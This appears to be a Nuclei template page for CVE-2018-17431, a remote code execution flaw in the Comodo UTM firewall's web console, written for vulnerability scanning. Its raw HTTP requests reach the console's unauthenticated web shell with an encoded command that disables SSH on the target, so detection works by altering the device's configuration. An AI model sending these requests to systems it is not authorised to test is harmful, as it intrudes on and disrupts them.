Skip to content
Nuclei Templates

Comodo Unified Threat Management Web Console - Remote Code Execution

ID: CVE-2018-17431

Severity: critical

Author: dwisiswant0

Tags: cve,cve2018,comodo,rce,edb

Description

Section titled “Description”

Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2018-17431


info:
  name: Comodo Unified Threat Management Web Console - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Apply the latest security patches or updates provided by Comodo to fix this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/48825
    - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17431
    - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437
    - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-17431
    cwe-id: CWE-287
    epss-score: 0.11416
    epss-percentile: 0.95098
    cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: comodo
    product: unified_threat_management_firewall
  tags: cve,cve2018,comodo,rce,edb


http:
  - raw:
      - |
        GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1
        Host: {{Hostname}}
        Connection: close
      - | # to triggering RCE
        GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1
        Host: {{Hostname}}
        Connection: close


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Configuration has been altered"


      - type: status
        status:
          - 200
# digest: 4b0a0048304602210088dc39a87b48e5924aad1bc187befd9ba65e310d185cb16bd091f35474bf5846022100dd20830ee91e6258f2ded7a5b4b3b9499d7b9875e605cbac0fd324e3d857d769:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-17431.yaml"

View on Github